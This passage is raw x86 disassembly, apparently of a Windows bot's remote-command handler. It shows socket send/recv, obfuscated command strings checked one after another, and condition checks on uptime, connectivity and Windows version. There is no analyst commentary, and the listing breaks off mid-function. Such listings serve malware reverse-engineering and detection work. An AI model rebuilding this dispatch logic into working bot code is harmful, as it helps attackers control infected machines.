push [ebp+arg_C]
call dword_4372CC ; send
cmp eax, 0FFFFFFFFh
jz short loc_412E4D
push ebx
lea eax, [ebp+var_2DA4]
push 80h
push eax
push [ebp+arg_C]
call dword_4372D0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_412EA8
loc_412E4D: ; CODE XREF: sub_40A938+84AD�j
; sub_40A938+84F8�j
cmp [ebp+arg_14], 0
mov edi, offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
mov ebx, offset aSSD ; "%s %s <%d>"
jnz short loc_412E79
call dword_43716C ; RtlGetLastWin32Error
push eax
push edi
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_412E79: ; CODE XREF: sub_40A938+8523�j
cmp [ebp+arg_18], 0
jz short loc_412E9A
call dword_43716C ; RtlGetLastWin32Error
push eax
push edi
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 18h
loc_412E9A: ; CODE XREF: sub_40A938+8545�j
push [ebp+arg_C]
call dword_4372D4 ; closesocket
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_412EA8: ; CODE XREF: sub_40A938+8513�j
push [ebp+arg_C]
call dword_4372D4 ; closesocket
lea eax, [ebp+var_2DA4]
push offset asc_440D78 ; "\n"
push eax
call sub_429B8E
push eax
lea eax, [ebp+var_61860]
push eax
call sub_429A33
add esp, 10h
cmp [ebp+arg_14], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_412EF2
lea eax, [ebp+var_61860]
push eax
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_412EF2: ; CODE XREF: sub_40A938+85A2�j
cmp [ebp+arg_18], ebx
jz short loc_412F27
lea eax, [ebp+var_61860]
push eax
jmp loc_40B999
; ---------------------------------------------------------------------------
loc_412F03: ; CODE XREF: sub_40A938+7EC8�j
; sub_40A938+7ED1�j ...
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_412F0D: ; CODE XREF: sub_40A938+83CA�j
push dword ptr [ebx]
push offset aQ5l5f_2to_60 ; "q5l5f.2TO.60"
call edi ; dword_437174
test eax, eax
jz short loc_412F2E
push dword ptr [ebx]
push offset aJbkl4Fbwcf1 ; "jBKL4/FbWCF1"
call edi ; dword_437174
test eax, eax
jz short loc_412F2E
loc_412F27: ; CODE XREF: sub_40A938+101D�j
; sub_40A938+105A�j ...
xor eax, eax
jmp loc_4148D2
; ---------------------------------------------------------------------------
loc_412F2E: ; CODE XREF: sub_40A938+85E0�j
; sub_40A938+85ED�j
xor eax, eax
cmp [ebx+4], eax
jz loc_413BB2
cmp [ebx+8], eax
jz loc_413BB2
push dword ptr [ebx]
and [ebp+arg_C], eax
and [ebp+arg_68], eax
loc_412F4A: ; DATA XREF: .text:off_44760C�o
mov [ebp+arg_8], 3
push offset aQ5l5f_2to_60 ; "q5l5f.2TO.60"
call edi ; dword_437174
test eax, eax
jnz short loc_412F63
mov [ebp+arg_C], 1
loc_412F63: ; CODE XREF: sub_40A938+8622�j
push dword ptr [ebx]
push offset aJbkl4Fbwcf1 ; "jBKL4/FbWCF1"
call edi ; dword_437174
test eax, eax
jnz short loc_412F77
mov [ebp+arg_68], 1
loc_412F77: ; CODE XREF: sub_40A938+8636�j
push dword ptr [ebx+4]
push offset aW3gp6_13acy1_0 ; "W3GP6.13AcY1"
call edi ; dword_437174
test eax, eax
jnz loc_413060
cmp [ebp+arg_C], eax
jz short loc_412FF4
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_412FCB
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_412FCB
mov ecx, [ebp+arg_10]
call sub_41DA92
push eax
push dword ptr [ebx+8]
call edi ; dword_437174
test eax, eax
jz short loc_412FF4
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_412FCB: ; CODE XREF: sub_40A938+8667�j
; sub_40A938+867A�j
mov ecx, [ebp+arg_10]
call sub_41DA92
push eax
call sub_42AE50
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AE50
pop ecx
push eax
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz loc_4148CF
loc_412FF4: ; CODE XREF: sub_40A938+8654�j
; sub_40A938+868C�j
cmp [ebp+arg_68], 0
jz short loc_413060
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413037
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413037
mov ecx, [ebp+arg_10]
call sub_41DA92
push eax
push dword ptr [ebx+8]
call edi ; dword_437174
test eax, eax
jnz short loc_413060
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_413037: ; CODE XREF: sub_40A938+86D3�j
; sub_40A938+86E6�j
mov ecx, [ebp+arg_10]
call sub_41DA92
push eax
call sub_42AE50
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AE50
pop ecx
push eax
call sub_427A85
pop ecx
test eax, eax
pop ecx
jnz loc_4148CF
loc_413060: ; CODE XREF: sub_40A938+864B�j
; sub_40A938+86C0�j ...
push dword ptr [ebx+4]
push offset aM08se_kt9td1 ; "M08SE.Kt9tD1"
call edi ; dword_437174
test eax, eax
jnz loc_41313A
cmp [ebp+arg_C], eax
jz short loc_4130DD
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4130B4
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4130B4
mov ecx, [ebp+arg_10]
call sub_41DA96
push eax
push dword ptr [ebx+8]
call edi ; dword_437174
test eax, eax
jz short loc_4130DD
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4130B4: ; CODE XREF: sub_40A938+8750�j
; sub_40A938+8763�j
mov ecx, [ebp+arg_10]
call sub_41DA96
push eax
call sub_42AE50
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AE50
pop ecx
push eax
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz loc_4148CF
loc_4130DD: ; CODE XREF: sub_40A938+873D�j
; sub_40A938+8775�j
cmp [ebp+arg_68], 0
jz loc_4139D3
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_41311B
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_41311B
mov ecx, [ebp+arg_10]
call sub_41DA96
push eax
jmp loc_41397C
; ---------------------------------------------------------------------------
loc_41311B: ; CODE XREF: sub_40A938+87C0�j
; sub_40A938+87D3�j
mov ecx, [ebp+arg_10]
call sub_41DA96
push eax
loc_413124: ; CODE XREF: sub_40A938+8945�j
call sub_42AE50
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AE50
pop ecx
push eax
jmp loc_413992
; ---------------------------------------------------------------------------
loc_41313A: ; CODE XREF: sub_40A938+8734�j
push dword ptr [ebx+4]
push offset a3eowx2ocng ; "3eowX/2OCnG/"
call edi ; dword_437174
test eax, eax
jnz loc_413282
push offset byte_454A34
push offset dword_457C20
call edi ; dword_437174
test eax, eax
jz short loc_41316B
push offset dword_457C20
call sub_41E3FB
test eax, eax
pop ecx
jz short loc_4131DA
loc_41316B: ; CODE XREF: sub_40A938+8822�j
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_413194
cmp [ebp+arg_18], eax
jnz short loc_41319A
cmp [ebp+arg_20], eax
jz short loc_4131B1
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push offset aSTryingToGetEx ; "%s Trying to get external IP."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_413194: ; CODE XREF: sub_40A938+8838�j
cmp [ebp+arg_18], 0
jz short loc_4131B1
loc_41319A: ; CODE XREF: sub_40A938+883D�j
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push offset aSTryingToGetEx ; "%s Trying to get external IP."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 10h
loc_4131B1: ; CODE XREF: sub_40A938+8842�j
; sub_40A938+8860�j
mov ecx, [ebp+arg_10]
call sub_41DA92
mov ecx, [ebp+arg_10]
push eax
call sub_41CE5F
push 1388h
push eax
mov dword ptr [ebp+var_C+4], eax
call dword_43707C ; WaitForSingleObject
push dword ptr [ebp+var_C+4]
call dword_437044 ; CloseHandle
loc_4131DA: ; CODE XREF: sub_40A938+8831�j
cmp [ebp+arg_C], 0
jz short loc_41323E
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413219
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413219
push offset dword_457C38
push dword ptr [ebx+8]
call edi ; dword_437174
test eax, eax
jz short loc_41323E
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_413219: ; CODE XREF: sub_40A938+88B9�j
; sub_40A938+88CC�j
push offset dword_457C38
call sub_42AE50
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42AE50
pop ecx
push eax
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz loc_4148CF
loc_41323E: ; CODE XREF: sub_40A938+88A6�j
; sub_40A938+88DA�j
cmp [ebp+arg_68], 0
jz loc_4139D3
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413278
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413278
push offset dword_457C38
jmp loc_41397C
; ---------------------------------------------------------------------------
loc_413278: ; CODE XREF: sub_40A938+8921�j
; sub_40A938+8934�j
push offset dword_457C38
jmp loc_413124
; ---------------------------------------------------------------------------
loc_413282: ; CODE XREF: sub_40A938+880E�j
push dword ptr [ebx+4]
push offset aS3dyJzo6r ; "s3dY//JZo6r/"
call edi ; dword_437174
test eax, eax
jnz short loc_4132BB
cmp [ebp+arg_C], eax
jz short loc_4132A7
push offset a3c9 ; "]&3c9"
push dword ptr [ebx+8]
call edi ; dword_437174
test eax, eax
jnz loc_4148CF
loc_4132A7: ; CODE XREF: sub_40A938+895B�j
cmp [ebp+arg_68], 0
jz loc_4139D3
push offset a3c9 ; "]&3c9"
jmp loc_41397C
; ---------------------------------------------------------------------------
loc_4132BB: ; CODE XREF: sub_40A938+8956�j
push dword ptr [ebx+4]
push offset aUwher1dagd80 ; "UWher1DAGD80"
call edi ; dword_437174
test eax, eax
jnz short loc_4132F4
cmp [ebp+arg_C], eax
jz short loc_4132E0
push offset dword_4439A4
push dword ptr [ebx+8]
call edi ; dword_437174
test eax, eax
jnz loc_4148CF
loc_4132E0: ; CODE XREF: sub_40A938+8994�j
cmp [ebp+arg_68], 0
jz loc_4139D3
push offset dword_4439A4
jmp loc_41397C
; ---------------------------------------------------------------------------
loc_4132F4: ; CODE XREF: sub_40A938+898F�j
push dword ptr [ebx+4]
push offset aPnb_aBfzu60 ; "pNb.a/Bfzu60"
call edi ; dword_437174
test eax, eax
jnz short loc_41330A
call dword_437184 ; GetTickCount
jmp short loc_413369
; ---------------------------------------------------------------------------
loc_41330A: ; CODE XREF: sub_40A938+89C8�j
push dword ptr [ebx+4]
push offset aZu2s6_o7_yt ; "Zu2s6.O7.yt/"
call edi ; dword_437174
test eax, eax
jnz short loc_413356
call dword_437184 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov edi, 3E8h
push 3Ch
mov ecx, eax
mov eax, dword_457F40
div edi
xor edx, edx
sub ecx, eax
mov eax, ecx
mov ecx, 15180h
div ecx
mov ecx, 0E10h
mov eax, edx
xor edx, edx
div ecx
pop ecx
mov eax, edx
jmp short loc_41336E
; ---------------------------------------------------------------------------
loc_413356: ; CODE XREF: sub_40A938+89DE�j
push dword ptr [ebx+4]
push offset a4hftz6holr ; "4hftZ/6HOlR/"
call edi ; dword_437174
test eax, eax
jnz short loc_4133AB
call sub_41BC27
loc_413369: ; CODE XREF: sub_40A938+89D0�j
mov ecx, 5265C00h
loc_41336E: ; CODE XREF: sub_40A938+8A1C�j
xor edx, edx
div ecx
cmp [ebp+arg_C], 0
mov edi, eax
jz short loc_41338B
push dword ptr [ebx+8]
call sub_42A030
cmp edi, eax
pop ecx
jb loc_4148CF
loc_41338B: ; CODE XREF: sub_40A938+8A40�j
cmp [ebp+arg_68], 0
jz loc_4139D3
push dword ptr [ebx+8]
call sub_42A030
cmp edi, eax
pop ecx
jbe loc_4139D3
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4133AB: ; CODE XREF: sub_40A938+8A2A�j
push dword ptr [ebx+4]
push offset aYqrdp_9rf4u0 ; "yqrdP.9rF4U0"
call edi ; dword_437174
test eax, eax
jnz short loc_4133F1
cmp [ebp+arg_C], eax
mov [ebp+arg_8], 2
jz short loc_4133D8
push offset dword_457CD8
call sub_41E3FB
test eax, eax
pop ecx
jz loc_4148CF
loc_4133D8: ; CODE XREF: sub_40A938+8A8B�j
cmp [ebp+arg_68], 0
jz loc_4139D3
push offset dword_457CD8
call sub_41E3FB
jmp loc_413998
; ---------------------------------------------------------------------------
loc_4133F1: ; CODE XREF: sub_40A938+8A7F�j
push dword ptr [ebx+4]
push offset a1uyis15kh_n1 ; "1UyIs15KH.n1"
call edi ; dword_437174
test eax, eax
jnz short loc_413437
xor edi, edi
mov [ebp+arg_8], 2
cmp dword_457030, edi
jnz loc_4148CF
push edi
push edi
lea eax, [ebp+var_3C]
push edi
push eax
call dword_456D94 ; InternetGetConnectedStateExA
test [ebp+var_3C], 1
jz short loc_41342F
cmp [ebp+arg_68], edi
jmp loc_41399B
; ---------------------------------------------------------------------------
loc_41342F: ; CODE XREF: sub_40A938+8AED�j
cmp [ebp+arg_C], edi
jmp loc_41399B
; ---------------------------------------------------------------------------
loc_413437: ; CODE XREF: sub_40A938+8AC5�j
push dword ptr [ebx+4]
push offset a9ljbh07crkd__0 ; "9lJBH07crkD."
call edi ; dword_437174
test eax, eax
jnz loc_413535
cmp [ebp+arg_C], eax
jz short loc_4134B8
push dword ptr [ebx+8]
push offset aD0ron_ctdg0_ ; "D0roN.CTDg0."
call edi ; dword_437174
test eax, eax
jnz short loc_4134B8
push 8
call sub_423737
test eax, eax
pop ecx
jz loc_4148CF
push dword ptr [ebx+8]
push offset aFr8ri0f9nfz_ ; "fr8ri0f9NfZ."
call edi ; dword_437174
test eax, eax
jnz short loc_4134B8
push 0Dh
call sub_423737
test eax, eax
pop ecx
jz loc_4148CF
push dword ptr [ebx+8]
push offset aWbzcx0Dknt_ ; "wbZcx0/Dknt."
call edi ; dword_437174
test eax, eax
jnz short loc_4134B8
push 8
call sub_423737
test eax, eax
pop ecx
jnz loc_4148CF
push 0Dh
call sub_423737
test eax, eax
pop ecx
jnz loc_4148CF
loc_4134B8: ; CODE XREF: sub_40A938+8B14�j
; sub_40A938+8B22�j ...
cmp [ebp+arg_68], 0
jz loc_4139D3
push dword ptr [ebx+8]
push offset aD0ron_ctdg0_ ; "D0roN.CTDg0."
call edi ; dword_437174
test eax, eax
jnz loc_4139D3
push 8
call sub_423737
test eax, eax
pop ecx
jnz loc_4148CF
push dword ptr [ebx+8]
push offset aFr8ri0f9nfz_ ; "fr8ri0f9NfZ."
call edi ; dword_437174
test eax, eax
jnz loc_4139D3
push 0Dh
call sub_423737
test eax, eax
pop ecx
jnz loc_4148CF
push dword ptr [ebx+8]
push offset aWbzcx0Dknt_ ; "wbZcx0/Dknt."
call edi ; dword_437174
test eax, eax
jnz loc_4139D3
push 8
call sub_423737
test eax, eax
pop ecx
jnz loc_4139D3
push 0Dh
call sub_423737
pop ecx
jmp loc_413981
; ---------------------------------------------------------------------------
loc_413535: ; CODE XREF: sub_40A938+8B0B�j
push dword ptr [ebx+4]
push offset aNyjsr1cv5ch0 ; "NyJsR1cV5CH0"
call edi ; dword_437174
test eax, eax
jnz loc_413835
lea eax, [ebp+var_208]
mov [ebp+var_208], 94h
push eax
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_4139D3
cmp [ebp+arg_C], 0
jz loc_4136D0
push dword ptr [ebx+8]
push offset a95 ; "95"
call edi ; dword_437174
test eax, eax
jnz short loc_4135A3
cmp [ebp+var_204], 4
jnz loc_4148CF
cmp [ebp+var_200], eax
jnz loc_4148CF
cmp [ebp+var_1F8], 1
jmp loc_4136A5
; ---------------------------------------------------------------------------
loc_4135A3: ; CODE XREF: sub_40A938+8C44�j
push dword ptr [ebx+8]
push offset aNt ; "nt"
call edi ; dword_437174
test eax, eax
jnz short loc_4135D6
cmp [ebp+var_204], 4
jnz loc_4148CF
cmp [ebp+var_200], eax
jnz loc_4148CF
cmp [ebp+var_1F8], 2
jmp loc_4136A5
; ---------------------------------------------------------------------------
loc_4135D6: ; CODE XREF: sub_40A938+8C77�j
push dword ptr [ebx+8]
push offset a98 ; "98"
call edi ; dword_437174
test eax, eax
jnz short loc_4135FD
cmp [ebp+var_204], 4
jnz loc_4148CF
cmp [ebp+var_200], 0Ah
jmp loc_4136A5
; ---------------------------------------------------------------------------
loc_4135FD: ; CODE XREF: sub_40A938+8CAA�j
push dword ptr [ebx+8]
push offset aMe ; "me"
call edi ; dword_437174
test eax, eax
jnz short loc_413624
cmp [ebp+var_204], 4
jnz loc_4148CF
cmp [ebp+var_200], 5Ah
jmp loc_4136A5
; ---------------------------------------------------------------------------
loc_413624: ; CODE XREF: sub_40A938+8CD1�j
push dword ptr [ebx+8]
push offset a2k_0 ; "2k"
call edi ; dword_437174
test eax, eax
jnz short loc_41363B
cmp [ebp+var_204], 5
jmp short loc_413698
; ---------------------------------------------------------------------------
loc_41363B: ; CODE XREF: sub_40A938+8CF8�j
push dword ptr [ebx+8]
push offset aXp_0 ; "xp"
call edi ; dword_437174
test eax, eax
jnz short loc_41365F
cmp [ebp+var_204], 5
jnz loc_4148CF
cmp [ebp+var_200], 1
jmp short loc_4136A5
; ---------------------------------------------------------------------------
loc_41365F: ; CODE XREF: sub_40A938+8D0F�j
push dword ptr [ebx+8]
push offset a2k3 ; "2k3"
call edi ; dword_437174
test eax, eax
jnz short loc_413683
cmp [ebp+var_204], 5
jnz loc_4148CF
cmp [ebp+var_200], 2
jmp short loc_4136A5
; ---------------------------------------------------------------------------
loc_413683: ; CODE XREF: sub_40A938+8D33�j
push dword ptr [ebx+8]
push offset aVista ; "vista"
call edi ; dword_437174
test eax, eax
jnz short loc_4136AC
cmp [ebp+var_204], 6
loc_413698: ; CODE XREF: sub_40A938+8D01�j
jnz loc_4148CF
cmp [ebp+var_200], 0
loc_4136A5: ; CODE XREF: sub_40A938+8C66�j
; sub_40A938+8C99�j ...
jz short loc_4136D0
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4136AC: ; CODE XREF: sub_40A938+8D57�j
push dword ptr [ebx+8]
push offset a7 ; "7"
call edi ; dword_437174
test eax, eax
jnz short loc_4136D0
cmp [ebp+var_204], 6
jnz short loc_4136D0
inc eax
cmp [ebp+var_200], eax
jz loc_4148D2
loc_4136D0: ; CODE XREF: sub_40A938+8C32�j
; sub_40A938:loc_4136A5�j ...
cmp [ebp+arg_68], 0
jz loc_4139D3
push dword ptr [ebx+8]
push offset a95 ; "95"
call edi ; dword_437174
test eax, eax
jnz short loc_41370D
cmp [ebp+var_204], 4
jnz loc_4139D3
cmp [ebp+var_200], eax
jnz loc_4139D3
cmp [ebp+var_1F8], 1
jmp loc_413983
; ---------------------------------------------------------------------------
loc_41370D: ; CODE XREF: sub_40A938+8DAE�j
push dword ptr [ebx+8]
push offset aNt ; "nt"
call edi ; dword_437174
test eax, eax
jnz short loc_413740
cmp [ebp+var_204], 4
jnz loc_4139D3
cmp [ebp+var_200], eax
jnz loc_4139D3
cmp [ebp+var_1F8], 2
jmp loc_413983
; ---------------------------------------------------------------------------
loc_413740: ; CODE XREF: sub_40A938+8DE1�j
push dword ptr [ebx+8]
push offset a98 ; "98"
call edi ; dword_437174
test eax, eax
jnz short loc_413767
cmp [ebp+var_204], 4
jnz loc_4139D3
cmp [ebp+var_200], 0Ah
jmp loc_413983
; ---------------------------------------------------------------------------
loc_413767: ; CODE XREF: sub_40A938+8E14�j
push dword ptr [ebx+8]
push offset aMe ; "me"
call edi ; dword_437174
test eax, eax
jnz short loc_41378E
cmp [ebp+var_204], 4
jnz loc_4139D3
cmp [ebp+var_200], 5Ah
jmp loc_413983
; ---------------------------------------------------------------------------
loc_41378E: ; CODE XREF: sub_40A938+8E3B�j
push dword ptr [ebx+8]
push offset a2k_0 ; "2k"
call edi ; dword_437174
test eax, eax
jnz short loc_4137B5
cmp [ebp+var_204], 5
loc_4137A3: ; CODE XREF: sub_40A938+8EE0�j
jnz loc_4139D3
cmp [ebp+var_200], 0
jmp loc_413983
; ---------------------------------------------------------------------------
loc_4137B5: ; CODE XREF: sub_40A938+8E62�j
push dword ptr [ebx+8]
push offset aXp_0 ; "xp"
call edi ; dword_437174
test eax, eax
jnz short loc_4137DC
cmp [ebp+var_204], 5
loc_4137CA: ; CODE XREF: sub_40A938+8EFB�j
jnz loc_4139D3
cmp [ebp+var_200], 1
jmp loc_413983
; ---------------------------------------------------------------------------
loc_4137DC: ; CODE XREF: sub_40A938+8E89�j
push dword ptr [ebx+8]
push offset a2k3 ; "2k3"
call edi ; dword_437174
test eax, eax
jnz short loc_413803
cmp [ebp+var_204], 5
jnz loc_4139D3
cmp [ebp+var_200], 2
jmp loc_413983
; ---------------------------------------------------------------------------
loc_413803: ; CODE XREF: sub_40A938+8EB0�j
push dword ptr [ebx+8]
push offset aVista ; "vista"
call edi ; dword_437174
test eax, eax
jnz short loc_41381A
cmp [ebp+var_204], 6
jmp short loc_4137A3
; ---------------------------------------------------------------------------
loc_41381A: ; CODE XREF: sub_40A938+8ED7�j
push dword ptr [ebx+8]
push offset a7 ; "7"
call edi ; dword_437174
test eax, eax
jnz loc_4139D3
cmp [ebp+var_204], 6
jmp short loc_4137CA
; ---------------------------------------------------------------------------
loc_413835: ; CODE XREF: sub_40A938+8C09�j
push dword ptr [ebx+4]
push offset aI6sd4ctzn0 ; "/I6sD/4CTzn0"
call edi ; dword_437174
test eax, eax
jnz loc_4138E0
cmp [ebp+arg_C], eax
jz short loc_41389C
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413885
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413885
push offset dword_457CD8
push dword ptr [ebx+8]
call edi ; dword_437174
test eax, eax
jz short loc_41389C
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_413885: ; CODE XREF: sub_40A938+8F25�j
; sub_40A938+8F38�j
push offset dword_457CD8
push dword ptr [ebx+8]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz loc_4148CF
loc_41389C: ; CODE XREF: sub_40A938+8F12�j
; sub_40A938+8F46�j
cmp [ebp+arg_68], 0
jz loc_4139D3
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4138D6
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_4138D6
push offset dword_457CD8
jmp loc_41397C
; ---------------------------------------------------------------------------
loc_4138D6: ; CODE XREF: sub_40A938+8F7F�j
; sub_40A938+8F92�j
push offset dword_457CD8
jmp loc_41398F
; ---------------------------------------------------------------------------
loc_4138E0: ; CODE XREF: sub_40A938+8F09�j
push dword ptr [ebx+4]
push offset aWrlthN3uh_1 ; "WRlth/n3Uh.1"
call edi ; dword_437174
test eax, eax
jnz loc_4139A2
cmp [ebp+arg_C], eax
jz short loc_413947
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413930
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_413930
push offset dword_457C20
push dword ptr [ebx+8]
call edi ; dword_437174
test eax, eax
jz short loc_413947
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_413930: ; CODE XREF: sub_40A938+8FD0�j
; sub_40A938+8FE3�j
push offset dword_457C20
push dword ptr [ebx+8]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz loc_4148CF
loc_413947: ; CODE XREF: sub_40A938+8FBD�j
; sub_40A938+8FF1�j
cmp [ebp+arg_68], 0
jz loc_4139D3
push offset dword_43D664
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_41398A
push offset a? ; "?"
push dword ptr [ebx+8]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_41398A
push offset dword_457C20
loc_41397C: ; CODE XREF: sub_40A938+87DE�j
; sub_40A938+893B�j ...
push dword ptr [ebx+8]
call edi ; dword_437174
loc_413981: ; CODE XREF: sub_40A938+8BF8�j
test eax, eax
loc_413983: ; CODE XREF: sub_40A938+8DD0�j
; sub_40A938+8E03�j ...
jnz short loc_4139D3
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_41398A: ; CODE XREF: sub_40A938+902A�j
; sub_40A938+903D�j
push offset dword_457C20
loc_41398F: ; CODE XREF: sub_40A938+8FA3�j
push dword ptr [ebx+8]
loc_413992: ; CODE XREF: sub_40A938+87FD�j
call sub_427A85
pop ecx
loc_413998: ; CODE XREF: sub_40A938+8AB4�j
pop ecx
loc_413999: ; CODE XREF: sub_40A938+9099�j
test eax, eax
loc_41399B: ; CODE XREF: sub_40A938+8AF2�j
; sub_40A938+8AFA�j
jz short loc_4139D3
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4139A2: ; CODE XREF: sub_40A938+8FB4�j
push dword ptr [ebx+4]
push offset aYqjsn0wtutn1 ; "yQJsn0wtUtn1"
call edi ; dword_437174
test eax, eax
jnz loc_413B86
cmp [ebp+arg_C], eax
mov eax, dword_456D88
mov [ebp+arg_8], 2
jz short loc_4139CD
test eax, eax
jz loc_4148CF
loc_4139CD: ; CODE XREF: sub_40A938+908B�j
cmp [ebp+arg_68], 0
jnz short loc_413999
loc_4139D3: ; CODE XREF: sub_40A938+87A9�j
; sub_40A938+890A�j ...
mov edi, [ebp+arg_8]
mov eax, [ebx+edi*4]
test eax, eax
jnz short loc_413A1B
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_413A06
cmp [ebp+arg_18], eax
jnz short loc_413A10
push ebx
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_413A06: ; CODE XREF: sub_40A938+90B2�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_413A10: ; CODE XREF: sub_40A938+90B7�j
push ebx
push offset aPtami1_agv ; "PTaMI1/.aGV/"
jmp loc_40C7CB
; ---------------------------------------------------------------------------
loc_413A1B: ; CODE XREF: sub_40A938+90A3�j
push eax
lea eax, [ebp+var_C130]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
jmp short loc_413A61
; ---------------------------------------------------------------------------
loc_413A32: ; CODE XREF: sub_40A938+912D�j
mov eax, [ebx+edi*4]
test eax, eax
jz short loc_413A61
push eax
lea eax, [ebp+var_6DBB0]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_6DBB0]
push eax
lea eax, [ebp+var_C130]
push eax
call sub_42A510
add esp, 14h
loc_413A61: ; CODE XREF: sub_40A938+90F8�j
; sub_40A938+90FF�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_413A32
mov al, [ebp+var_C130]
cmp al, byte_443988
jz short loc_413AAE
cmp [ebp+arg_14], 0
mov ebx, offset aSFailedToParse ; "%s Failed to parse command."
jnz short loc_413A9A
cmp [ebp+arg_18], 0
jnz short loc_413AA4
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_413A9A: ; CODE XREF: sub_40A938+9146�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_413AA4: ; CODE XREF: sub_40A938+914C�j
push offset aPtami1_agv ; "PTaMI1/.aGV/"
jmp loc_40D202
; ---------------------------------------------------------------------------
loc_413AAE: ; CODE XREF: sub_40A938+913B�j
lea eax, [ebp+var_C130]
xor edi, edi
push eax
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_413B22
loc_413AC1: ; CODE XREF: sub_40A938+91E8�j
lea eax, [ebp+edi+var_C130]
cmp byte ptr [eax], 5Fh
jnz short loc_413ADA
cmp [ebp+edi+var_C131], 20h
jnz short loc_413ADA
mov byte ptr [eax], 2Dh
loc_413ADA: ; CODE XREF: sub_40A938+9193�j
; sub_40A938+919D�j
cmp byte ptr [eax], 2Bh
jnz short loc_413AEC
cmp [ebp+edi+var_C131], 20h
jnz short loc_413AEC
mov byte ptr [eax], 5Fh
loc_413AEC: ; CODE XREF: sub_40A938+91A5�j
